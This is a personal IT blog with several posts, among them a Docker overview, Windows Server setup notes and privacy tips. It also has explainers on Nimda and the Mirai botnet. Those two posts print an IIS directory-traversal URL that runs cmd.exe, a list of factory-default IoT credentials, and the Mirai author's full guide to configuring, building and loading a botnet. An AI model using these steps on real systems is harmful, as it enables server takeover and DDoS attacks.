Thursday, March 23, 2017

Docker is different. Docker Rules!

Docker is one of the most important software programs I have seen in my career. Forget most of what you know about VMware, KVM, or Xen. Docker Datacenter on Docker Engine provides portability, service discovery, load balancing, security, high performance, and scalability.
IT is in the middle of a transformation, driven by the desire to increase productivity, improve efficiency, and meet the rising demands of business. In this digital world, software becomes the vehicle that connects the customer to the business and optimizes the organization's operations. Finding the right platform, one that boosts application deployment speed and increases security and scalability while maintaining control, is crucial.

Docker is a software container platform. System administrators use Docker to run and manage apps side-by-side in isolated containers to get better compute density. Companies use Docker to build agile software delivery pipelines to ship new features faster, more securely and with confidence for both Linux and Windows Server. Developers use Docker to eliminate “works on my machine” problems when collaborating on code with co-workers.

What is a Container?

With containers, everything required to make a piece of software run is packaged into an isolated unit. Unlike VMs, containers do not bundle a full operating system; only the libraries and settings required to make the software work are included. This makes for efficient, lightweight, self-contained systems and guarantees that software will always run the same, regardless of where it's deployed.
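As a sketch of what that packaging looks like, here is a minimal, hypothetical Dockerfile; the base image, file name, and command are illustrative, not from any particular project:

```dockerfile
# Small base image instead of a full operating system
FROM alpine:3.5

# Copy in only the application itself (hypothetical binary)
COPY app /usr/local/bin/app

# The single process the container runs
CMD ["/usr/local/bin/app"]
```

Building this with `docker build` produces an image that carries the app plus only what the base image provides, nothing else.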

This is from the Docker Blog:

A natural response when first working with Docker containers is to try and compare them to virtual machines. Oftentimes we hear people describe Docker containers as “lightweight VMs”.
This is completely understandable, and many people have done the exact same thing when they first started working with Docker. It’s easy to connect those dots as both technologies share
some characteristics. Both are designed to provide an isolated environment in which to run an application. 

Additionally, in both cases that environment is represented as a binary artifact that can be moved between hosts. There may be other similarities, but these are the two biggest.

The key is that the underlying architecture is fundamentally different between containers and virtual machines. A useful analogy for Docker is comparing houses (virtual machines) to apartments (Docker containers). 

Houses (the VMs) are fully self-contained and offer protection from unwanted guests. They also each possess their own infrastructure – plumbing, heating, electrical, etc. Furthermore, in the vast majority
of cases houses are all going to have at a minimum a bedroom, living area, bathroom, and kitchen. It’s incredibly difficult to ever find a “studio house” – even if one buys the smallest house they
can find, they may end up buying more than they need because that’s just how houses are built.

Apartments (Docker containers) also offer protection from unwanted guests, but they are built around shared infrastructure.  The apartment building (the server running the Docker daemon,
otherwise known as a Docker host) offers shared plumbing, heating, electrical, etc. to each apartment. Additionally apartments are offered in several different sizes – from studio to multi-bedroom
penthouse. You’re only renting exactly what you need. Docker containers share the underlying resources of the Docker host. Furthermore, developers build a Docker image that includes
exactly what they need to run their application: starting with the basics and adding in only what is needed by the application. Virtual machines are built in the opposite direction. They start
with a full operating system and, depending on the application, developers may or may not be able to strip out unwanted components.

An image is a filesystem plus the parameters to use at runtime. It has no state and never changes. A container is a running instance of an image. When you run an image, Docker Engine checks whether you already have it locally; if not, it downloads the image from Docker Hub, loads it into a container, and runs it. Depending on how it was built, an image might run a simple, single command and then exit. This is what hello-world does. A Docker image, though, is capable of much more. An image can start software as complex as a database, wait for you (or someone else) to add data, store the data for later use, and then wait for the next person.
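That flow is visible on the command line. This is an abbreviated, illustrative transcript of running hello-world on a machine that does not yet have the image:

```
$ docker run hello-world
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
...
Hello from Docker!
This message shows that your installation appears to be working correctly.
```

On a second run, Engine finds the image locally and skips the download entirely.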

Docker Engine lets people (or companies) create and share software through Docker images. Using Docker Engine, you don’t have to worry about whether your computer can run the software in a Docker image — a Docker container can always run it.

Docker Datacenter on Docker Engine includes service discovery and load balancing capabilities to aid DevOps initiatives across any organization. Service discovery and load balancing make it easy for developers to create applications that can dynamically discover each other, and these features simplify the scaling of applications by operations engineers.

Docker Datacenter allows network and system administrators to provide secure, scalable, and highly efficient networks, internally and externally, through service discovery and load balancing. Service discovery is an integral part of any distributed system and service-oriented architecture. As applications increasingly move toward microservices and service-oriented architectures, the operational complexity of these environments grows. Service discovery registers a service and publishes its connectivity information so that other services know how to connect to it.

Internal DNS server: Docker Engine includes an embedded DNS server that lets containers on user-defined networks resolve one another by name.
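A small, hypothetical docker-compose.yml sketches how this works: because both services sit on the same user-defined network, the `web` container can reach the database simply by the service name `db` (the image names and credentials here are illustrative):

```yaml
version: '2'
services:
  web:
    image: my-web-app          # hypothetical application image
    depends_on:
      - db
    environment:
      DB_HOST: db              # the service name resolves via Docker's internal DNS
  db:
    image: postgres:9.6
    environment:
      POSTGRES_PASSWORD: example   # illustrative only
```

No IP addresses are hard-coded; if `db` is rescheduled or scaled, `web` still finds it by name.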

The Container Networking Model

More resources can be found at this link:

Monday, November 7, 2016

How to fix millions of vulnerable IoT devices used in the Mirai DDoS attacks.


Fifteen years ago I received a call from my friend Don Jensen. He was the head IT guy for Granite Construction's Heavy Construction division. He had four remote sites infected with the Nimda worm. 

Wikipedia sums it up here:

"Nimda is a file infecting computer worm. It quickly spread, surpassing the economic damage caused by previous outbreaks such as Code Red. Nimda utilized several types of propagation techniques and this caused it to become the Internet’s most widespread virus/worm within 22 minutes.

The worm was released on September 18, 2001. Nimda affected both user workstations (clients) running Windows 95, 98, NT, 2000 or XP and servers running Windows NT and 2000. 

The worm exploited various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities. Nimda was hugely successful at exploiting well-known and long-solved vulnerabilities in the Microsoft IIS server."

It was affecting all of the telephone service at the remote sites (Las Vegas, Minneapolis, Dallas, and Tampa). The phone systems were running Cisco Communication Center on top of Windows 2000 server. Microsoft Internet Information Server administration GUI was the admin control console.

What a mess. I was at my home in California, and traveling to each remote site was not possible.

This HAD to be repaired remotely, so I started to investigate what made Nimda tick, and found a solution. (This advisory from CERT was really helpful.)

I used it against itself. I "hacked" each of the Windows servers using the exact same security hole that made Nimda possible: I opened a browser window, plugged in the IP address of the infected server, and began typing commands, starting with "CMD.EXE".
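For the curious, the class of request involved looked something like the well-documented IIS 4.0/5.0 Unicode directory-traversal pattern below (the server address is a placeholder): the overlong-UTF-8 `..%c0%af..` sequence slips past the path check and lets a plain browser invoke CMD.EXE on the server:

```
http://<infected-server>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
```

Swap `dir` for other commands and you have a remote shell through the same hole the worm used.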

After the massive DDoS attack in October 2016, I started to think about how to remotely patch the millions of video cameras, DVRs, and doorbells being compromised by Mirai, and I downloaded the source code. I think this just might work, but it may not be legal to remotely patch and upgrade all the IoT devices in the world. 

Monday, October 24, 2016

Mirai botnet takes down major websites with massive DDoS (Distributed Denial of Service) attack.


Last Friday, DNS provider Dyn was hit with one of the most powerful distributed denial of service (DDoS) attacks ever recorded, which knocked major websites offline for several hours.

Dyn provides services, much as CloudFlare does, that Internet companies use for external "cloud" hosting: DNS, load balancing, traffic management, and border/gateway malware protection. You can read the Dyn blog here:

A DDoS attack is a distributed DoS attack (DoS is short for denial of service). 

How to shut down major web sites like Twitter, Amazon, Tumblr, Reddit, Spotify and Netflix. 

The DDoS attack on Dyn last Friday was carried out by a Mirai botnet made up of tens of thousands of Internet of Things (IoT) devices, mainly because users failed to change the default passwords on low-cost IP cameras and routers. In the attack on Dyn, the hackers were able to generate over 600 gigabits per second of network traffic. Analysts have confirmed that the attack used the compute power of poorly secured IP cameras, home controllers, and other IoT devices to flood Dyn's servers with data. While it has been known for some time that IP cameras are vulnerable, this is the first time we've seen that vulnerability harnessed on such a large scale: three DDoS attacks within a matter of hours, with between 60,000 and 600,000 home networks connecting simultaneously to form a massive 600-gigabit-per-second attack. The traffic came from DVRs, IP cameras, and other devices with the default passwords left in place after installation. Some of these devices have software or "firmware" updates to fix security vulnerabilities the vendor discovers, but few hardware makers do a good job of making that process simple and easy for users, or of alerting customers when firmware updates are available.

Once installed, Mirai scans the internet. When it finds targets, it attempts to log in using many well-known default passwords. Once Mirai finds and infects a new device, the device contacts the hacker controlling it and becomes part of a botnet under the hacker's control. 
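The core of that scan is nothing more than a dictionary walk. Here is a minimal shell sketch of the idea; the credential pairs are a few real factory defaults from Mirai's published list, but the "device" is simulated in a variable rather than an actual telnet login:

```shell
# A few factory-default user:pass pairs from Mirai's published dictionary
creds="root:xc3511 root:vizxv admin:admin root:admin support:support"

# Simulated target device still on its factory default (hypothetical)
device="admin:admin"

found=""
for c in $creds; do
  if [ "$c" = "$device" ]; then
    found="$c"        # a "successful login": the device would now join the botnet
    break
  fi
done

echo "matched default credentials: ${found:-none}"
```

Against real devices, each guess is a telnet attempt on port 23 or 2323; the loop above is why changing the default password defeats this entire class of attack.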

Will Dormann, senior vulnerability analyst at the CERT Coordination Center (CERT/CC) adds this:

“When it comes to software updates, automatic updates are good,” Dormann said. “Simple updates that notify the user and require intervention are okay. Updates that require the user to dig around to find and install manually are next to worthless.  Devices that don’t have updates at all are completely worthless. And that can be applied to traditional computing as well.  It’s just that with IoT, you likely have less technical users at the helm.”

“Even when users are interested in and looking for this information, the vendor doesn’t always make it easy,” he said. Instead of hard-coding credentials or setting default usernames and passwords that many users will never change, hardware makers should require users to pick a strong password when setting up the device.

There’s a list of just over 60 built-in usernames and passwords that the Mirai bot uses to scan for other vulnerable devices. Even this modest password dictionary is enough to find hundreds of thousands of easily-owned devices at a time.

If you own a router, IP camera or other device that has a Web interface and you haven’t yet changed the factory default credentials, you may already be part of an IoT botnet. There is no simple way to tell one way or the other whether it has been compromised. The solution to eliminating the malware infection isn’t difficult. Mirai is loaded into memory, which means it gets wiped once the infected device is disconnected from its power source. 

In September 2016, the hacker responsible for creating Mirai released the source code, effectively letting anyone build their own attack army using Mirai.

Mirai is specifically designed to exploit devices which, although relatively tiny in size and capacity, have enough computing power to send out network requests (TCP/IP packets) to another server, which is what happened here in a highly coordinated fashion.

The Mirai infrastructure is much more complex than the other various botnet variants around. The diagram above outlines the basic functionality of Mirai and its components. 

Bots (B) communicating with the Mirai C2 (C) were found scanning across TCP ports 23 and 2323 as well as performing DDoS attacks against various victims (D). Bots sent one-way traffic, containing the IP addresses and credentials of vulnerable hosts, towards a report server (R). This was hypothesized because several other IP addresses (L, loaders) would communicate with IP addresses that had previously been scanned and were later identified as bots. This communication contained bi-directional traffic on port 23, sometimes with large packet sizes, signifying interaction with the telnet service. We observed these same victims accessing a different IP address (M) on port 80 with large packet sizes. This IP address hosted the Mirai binary itself, and the large packet sizes were due to the victim downloading the malware. After downloading the binary and finishing interaction with the loader, the victim IP would begin bot activity. Throughout our investigation we identified a long-lived IP connection from a TOR exit node to the report server (R), which we believe may have been the botnet author controlling the botnet. With the botnet established, it was being sold to various users (U) who used an API hosted on the C2 server (C) to order DDoS attacks.

After downloading and un-zipping the source code, I came across a file called "forumpost.txt" from the author of the Mirai malware. I share it with you here:

[FREE] World's Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 AM

Greetz everybody,

When I first go in DDoS industry, I wasn't planning on staying in it long. I made my money, there's lots of eyes looking at IOT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie <- low quality reverse engineer posts by unixfreaxjp (backup, in case he decides to edit, lol)
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. "We still have better kung fu than you kiddos" don't make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL

Let me give you some slaps back -
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol "And doing the backdoor to connect via HTTP on". you got tripped up by signal flow ;) try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say 'chroot("/") so predictable like torlus' but you don't understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for you

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

Just as I forever be free, you will be doomed to mediocracy forever.

Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

Pro Setup (my setup)
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

Infrastructure Overview
- To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

Configuring Bot
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards :)
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file

Run this inside mirai directory
./ debug telnet
You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:
./debug/enc string

The output should look like this
XOR'ing 20 bytes of data...

To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument tas well. So for example, the table.c line originally looks like this

add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //

Now that we know value from enc tool, we update it like this
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22​", 20); //

Some values are strings, some are port (uint16 in network order / big endian).

Configuring CNC
apt-get install mysql-server mysql-client
CNC requires database to work. When you install database, go into it and run following commands:

This will create database for you. To add your user,
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

Now, go into file ./mirai/cnc/main.go

Edit these values

const DatabaseAddr string   = ""
const DatabaseUser string   = "root"
const DatabasePass string   = "password"
const DatabaseTable string  = "mirai"

To the information for the mysql server you just installed

Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

Building CNC+Bot
The CNC, bot, and related tools:
[Image: BVc7qJs.png]


How to build bot + CNC
In mirai folder, there is script.

./ debug telnet
Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder

./ release telnet
Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder

Building Echo Loader
Loader reads telnet entries from STDIN in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here

You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
When you compile, place your dlr.* files into the folder ./bins for the loader

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this

cat file.txt | ./loader

Remember to ulimit!

Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "My bot not connect, fix it"

Thursday, December 3, 2015

Net | Brain

We’ve come a long way from hand-drawn network diagrams. Advancements in diagramming software have allowed engineers to spend less time documenting their network and more time performing important network management tasks. Unfortunately, too many networks are still documented with outdated techniques.

Three Generations of Diagramming Software

Static Diagrams with Visio
Neatly drawn but cumbersome to create and update.
Static Diagrams with Auto-Discovery
Difficult to scale and overly complex to set up.
Dynamic Diagrams
Highly scalable, built on-demand, and always up-to-date.
Dynamic Network Diagrams
Dynamic network diagram technology was designed to overcome the challenges of previous diagramming software. Dynamic diagrams are created on-demand, instantly. Because they are data-driven from the live network, they are always up-to-date. Through this approach, there’s no need to create and maintain a database of drawings.

Thursday, November 19, 2015

Don't run around naked on the Internet. Use Signal and TOR.

We should be using software that we can rely on. This doesn’t need to be a big change. It doesn’t have to be disruptive. It should be invisible; it should be something that happens effortlessly. I like apps like Signal because they don’t require you to change your method of communication. You can use it right now. I also like TOR for a browser.

  • The first step that anyone could take is to encrypt their phone calls and their text messages. You can do that through the smartphone app Signal, by Open Whisper Systems. It’s free, and you can just download it immediately. And anybody you’re talking to now, their communications, if intercepted, can’t be read by adversaries. [Signal is available for iOS and Android, and, unlike a lot of security tools, is very easy to use.]
  • You should encrypt your hard disk, so that if your computer is stolen the information isn’t obtainable to an adversary — pictures, where you live, where you work, where your kids are, where you go to school. [Here is a guide to encrypting your disk on Windows, Mac, and Linux.]
  • Use a password manager. One of the main things that gets people’s private information exposed, not necessarily to the most powerful adversaries, but to the most common ones, are data dumps. Your credentials may be revealed because some service you stopped using in 2007 gets hacked, and your password that you were using for that one site also works for your Gmail account. A password manager allows you to create unique passwords for every site that are unbreakable, but you don’t have the burden of memorizing them. [The password manager KeePassX is free, open source, cross-platform, and never stores anything in the cloud.]
  • The other thing there is two-factor authentication. The value of this is if someone does steal your password, or it’s left or exposed somewhere … [two-factor authentication] allows the provider to send you a secondary means of authentication — a text message or something like that. [If you enable two-factor authentication, an attacker needs both your password as the first factor and a physical device, like your phone, as your second factor, to log in to your account. Gmail, Facebook, Twitter, Dropbox, GitHub, and tons of other services all support two-factor authentication.]

Monday, November 9, 2015

Facebook faces a daily fine of $269,000 for cookies that track users.

BRUSSELS — A Brussels court has ruled that Facebook must stop, within 48 hours, collecting data on users’ Internet browsing when they are not logged in. If it does not stop, Facebook will face a daily fine of $269,000.

Facebook has acknowledged that it collects data on users’ Internet browsing even when they aren’t logged in, through a cookie it places in a user's Web browser when they visit the Facebook website. That cookie reports back to Facebook whenever the browser accesses a Web page with an active social plug-in, such as a “like” button.

Facebook says the process is necessary for security purposes to protect people from spam, malware and other attacks. The firm says it uses the information from that cookie only to weed out browsers being piloted by a machine rather than a human, and discards the browsing data after 10 days. Machine-driven browsers are often used to hack into users’ Facebook pages, the company says.

Thursday, March 12, 2015

Installing Windows Server 2012 R2 in VirtualBox

I received a call from a client with an old server running a mission-critical database application on Windows Server 2003 that had to be replaced. Microsoft has announced the end of support for Windows Server 2003, including all updates; Windows Server 2003 is at its end of life. We discussed upgrading to Windows Server 2012 R2 and running the database application in a VM until we can migrate it to Windows Server 2012 R2. New hardware was purchased, and I set about kicking Windows Server 2012 R2 around in a VM on VirtualBox. Here is a bit of what I found.

First, I downloaded the ISO file from Microsoft and created a new VM in Oracle VirtualBox. I attached the ISO image to a second storage controller and let the VM boot from there. I selected Windows 2012 as the intended OS and left the defaults alone: 2 GB of RAM, 2 CPUs, and a dynamically allocated 25 GB virtual disk. Video RAM was left at 128 MB, and VT-x/AMD-V was enabled by default as well.
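The same VM can also be created headlessly with VBoxManage. This is a sketch matching the settings above; the VM name and file paths are illustrative, and it assumes the ISO has already been downloaded:

```
VBoxManage createvm --name "WS2012R2" --ostype Windows2012_64 --register
VBoxManage modifyvm "WS2012R2" --memory 2048 --cpus 2 --vram 128
VBoxManage createhd --filename WS2012R2.vdi --size 25600
VBoxManage storagectl "WS2012R2" --name "SATA" --add sata
VBoxManage storageattach "WS2012R2" --storagectl "SATA" --port 0 --device 0 --type hdd --medium WS2012R2.vdi
VBoxManage storageattach "WS2012R2" --storagectl "SATA" --port 1 --device 0 --type dvddrive --medium ws2012r2.iso
```

Scripting it this way makes the build repeatable if you need to stand up several test VMs.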

Windows Server 2012 R2 provides new features and capabilities: server virtualization, software-defined networking, server management and automation, a web and application platform, access and information protection, virtual desktop infrastructure, and more. Windows Server 2012 R2 is released in several different editions for different needs, and supports enterprise-grade storage, identity, networking, virtualization, and more. It provides 5x more logical processor support, 4x more physical memory, and 16x more memory per virtual machine than Windows Server 2008. Microsoft includes IP Address Management (IPAM) and Software Defined Networking (SDN) to allow virtualization and network management teams to allocate network bandwidth as needed.

Windows Server 2012 R2 Essentials Edition (formerly Windows Small Business Server) is a server designed for small businesses; it is limited to 25 users, 50 devices, and a total of 2 VMs. It is an ideal first server, and it can also be used as the primary server in a multi-server environment.

Microsoft adds System Center 2012 R2 with versions of Operations Manager, Virtual Machine Manager, and Configuration Manager to the standard edition of Server 2012 R2.

Microsoft has made it easy to join Windows 2012 R2 to Azure clouds, and it supports commonly used Linux distros as manageable guests within the Hyper-V virtualization and Azure cloud infrastructure. If organizations want a control panel, Microsoft offers System Center Operations Manager, Virtual Machine Manager, and Configuration Manager, which are deeply integrated with Server 2012 R2 and Hyper-V. Hyper-V boots UEFI rather than traditional BIOS. Virtual machines can be moved from host to host using compression and, where hardware is available to support it, very fast transports such as 10GbE, InfiniBand, and other connections. These high-speed connections are crucial to VM movements among hosts in hypervisor fabrics.

  • What's New in 802.1X Authenticated Wired Access
    This topic provides information about the new features for 802.1X Authenticated Wired Access in Windows Server 2012 R2 and Windows 8.1.
  • What's New in 802.1X Authenticated Wireless Access
    This topic provides information about the new features for 802.1X Authenticated Wireless Access in Windows Server 2012 R2 and Windows 8.1, including Miracast Wireless Display and faster Wi-Fi with 802.11ac.
  • What's New in Active Directory in Windows Server
    You can leverage new features in Active Directory to enable employees and partners to access protected corporate data from their personal devices and at the same time manage risk and govern the use of corporate resources.
  • What's New in Active Directory Domain Services (AD DS)
    Active Directory Domain Services (AD DS) in Windows Server 2012 includes new features that make it simpler and faster to deploy domain controllers (both on-premises and in the cloud), more flexible and easier to both audit and authorize access to files with Dynamic Access Control, and easier to perform administrative tasks at scale, either locally or remotely, through consistent graphical and scripted management experiences.
  • What's New in Active Directory Rights Management Services (AD RMS)
    Active Directory Rights Management Services (AD RMS) is the server role that provides you with management and development tools that work with industry security technologies—including encryption, certificates, and authentication—to help organizations create reliable information protection solutions.
  • What's New in BitLocker
    BitLocker now provides support for device encryption on x86-based and x64-based computers with a Trusted Platform Module that supports connected standby. This topic describes the new functionality. BitLocker encrypts the hard drives on your computer to provide enhanced protection against data theft or exposure on computers and removable drives that are lost or stolen.
  • What's New in BranchCache
    BranchCache in Windows Server 2012 and Windows 8 provides substantial performance, manageability, scalability, and availability improvements.
  • What's New in Certificate Services in Windows Server
    Active Directory Certificate Services in Windows Server 2012 R2 supports a policy module for the Network Device Enrollment Service, TPM key attestation, and new Windows PowerShell cmdlets for backup and restore. AD CS in Windows Server 2012 also introduced multiple new deployment and manageability capabilities over previous versions.
  • What's New in Data Deduplication in Windows Server
    Data Deduplication can now be installed on a scale-out file share and used to optimize live virtual hard disks (VHDs) for Virtual Desktop Infrastructure (VDI) workloads. This topic describes this and other new functionality.
  • What's New in DFS Replication and DFS Namespaces in Windows Server
    This topic describes the features that were added to DFS Replication (DFSR or DFS-R) in Windows Server 2012 R2. DFS Namespaces and DFS Replication in Windows Server 2012 provide new management functionality as well as interoperability with DirectAccess and Data Deduplication.
  • What's New in DHCP
    Dynamic Host Configuration Protocol (DHCP) in Windows Server 2012 R2 provides new features and capabilities over previous versions. This document describes the new deployment, management, and operational capabilities added to the DHCP Server role in Windows Server 2012 R2. Dynamic Host Configuration Protocol (DHCP) is an Internet Engineering Task Force (IETF) standard designed to reduce the administration burden and complexity of configuring hosts on a TCP/IP-based network, such as a private intranet.
  • What's New in DNS Server
    This topic provides information about new and changed functionality in the DNS Server service in Windows Server 2012 R2. Domain Name System (DNS) services are used in TCP/IP networks for naming computers and network services. DNS naming locates computers and services through user-friendly names.
  • What's New in DNS Client
    This topic provides information about new and changed functionality in the DNS Client service in Windows 8.1 and Windows 8.
  • What's New in Failover Clustering in Windows Server
    This topic describes the Failover Clustering functionality that is new or changed in Windows Server 2012 R2. Failover clusters provide high availability and scalability to many server workloads. These include file share storage for server applications such as Hyper-V and Microsoft SQL Server, and server applications that run on physical servers or virtual machines.
  • New and Changed Functionality in File and Storage Services
    File and Storage Services provides a number of new management, scalability, and functionality improvements in Windows Server 2012 R2 and Windows Server 2012.
  • What's New in File Server Resource Manager in Windows Server
    This topic summarizes the File Server Resource Manager functionality in Windows Server 2012 R2 that is new or changed since Windows Server 2012. File Server Resource Manager provides a set of features that allow you to manage and classify data that is stored on file servers.
  • What's New in Group Policy in Windows Server
    This topic describes the new and changed functionality of the Group Policy feature in Windows Server 2012 R2 and Windows Server 2012. Group Policy is an infrastructure that enables you to specify managed configurations for users and computers through Group Policy settings and Group Policy Preferences.
  • What's New in Hyper-V for Windows Server 2012 R2
    This topic describes the new and changed functionality of the Hyper-V role in Windows Server 2012 R2. The Hyper-V role enables you to create and manage a virtualized computing environment by using virtualization technology that is built in to Windows Server 2012. Hyper-V virtualizes hardware to provide an environment in which you can run multiple operating systems at the same time on one physical computer, by running each operating system in its own virtual machine.
  • What's New in Hyper-V Network Virtualization
    This topic describes the new or changed features and functionality in Hyper-V Network Virtualization in Windows Server 2012 R2.
  • What's New in Hyper-V Virtual Switch in Windows Server 2012 R2
    This topic provides information about the new features in Hyper-V Virtual Switch in Windows Server 2012 R2.
  • What's New in IPAM
    IP Address Management (IPAM) is a feature that was first introduced in Windows Server 2012 that provides highly customizable administrative and monitoring capabilities for the IP address infrastructure on a corporate network. IPAM in Windows Server 2012 R2 includes many enhancements.
  • What's New in iSCSI Target Server in Windows Server
    This topic describes the new and changed functionality of iSCSI Target Server in Windows Server 2012 R2.
  • What's New in Kerberos Authentication
    The Microsoft Windows Server operating systems implement the Kerberos version 5 authentication protocol and extensions for public key and password-based authentication. The Kerberos authentication client is implemented as a security support provider (SSP) and can be accessed through the Security Support Provider Interface (SSPI).
  • What's New for Managed Service Accounts
    Standalone Managed Service Accounts, which were introduced in Windows Server 2008 R2 and Windows 7, are managed domain accounts that provide automatic password management and simplified SPN management, including delegation of management to other administrators.
  • What's New in Networking
    This topic describes the new and changed functionality of networking in Windows Server 2012 R2. Discover new networking technologies and new features for existing technologies in Windows Server 2012. Technologies covered include BranchCache, Data Center Bridging, NIC Teaming, and more.
  • What's New in Print and Document Services in Windows Server
    This topic describes the new and changed functionality of Print and Document Services in Windows Server 2012 R2.
  • What's New in Remote Access
    A number of new Remote Access server and client features are included in Windows Server 2012 R2 and Windows 8.1.
  • What's New in Remote Desktop Services in Windows Server
    This topic describes the Remote Desktop Services functionality that is new or changed in Windows Server 2012 R2 and Windows Server 2012. The Remote Desktop Services server role provides technologies that enable users to connect to virtual desktops, RemoteApp programs, and session-based desktops. With Remote Desktop Services, users can access remote connections from within a corporate network or from the Internet.
  • Security and Protection
    This topic describes the significant changes to security technologies in Windows Server 2012 R2 and Windows Server 2012 and how those changes impact Windows 8.1.
  • What's New in Server Manager
    In this blog post, senior Server Manager program manager Wale Martins describes the innovations and value of the new Server Manager. Server Manager in Windows Server 2012 lets administrators manage multiple remote servers that are running Windows Server 2012, Windows Server 2008 R2, Windows Server 2008, or Windows Server 2003.
  • What's New in Smart Cards
    Smart cards and their associated personal identification numbers (PINs) are an increasingly popular, reliable, and cost-effective form of two-factor authentication. With the right controls in place, a user must have the smart card and know the PIN to gain access to network resources.
  • What's New in SMB in Windows Server
    This topic introduces the new features and functionality for Server Message Block (SMB) in Windows Server 2012 R2.
  • What's New in Storage Spaces in Windows Server
    This topic describes the features that were added to Storage Spaces in Windows Server 2012 R2, including storage tiers, write-back cache, and dual parity.
  • What's New in TLS/SSL (Schannel SSP)
    Schannel is a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols. The Security Support Provider Interface (SSPI) is an API used by Windows systems to perform security-related functions including authentication.
  • What's New in Windows Deployment Services in Windows Server
    A Windows Deployment Services (WDS) server running Windows Server 2012 R2 can be managed using the Windows PowerShell cmdlets for WDS. Using Windows PowerShell cmdlets, you can add driver packages, add client images, enable and disable boot and install images, and do many other common WDS tasks. For a full reference, see Windows PowerShell Support for Windows Server. Windows Deployment Services is a server role that enables you to remotely deploy Windows operating systems. You can use it to set up new computers by using a network-based installation.
  • What's New in Windows PowerShell
    Windows PowerShell includes several significant features that extend its use, improve its usability, and allow you to control and manage Windows-based environments more easily and comprehensively.
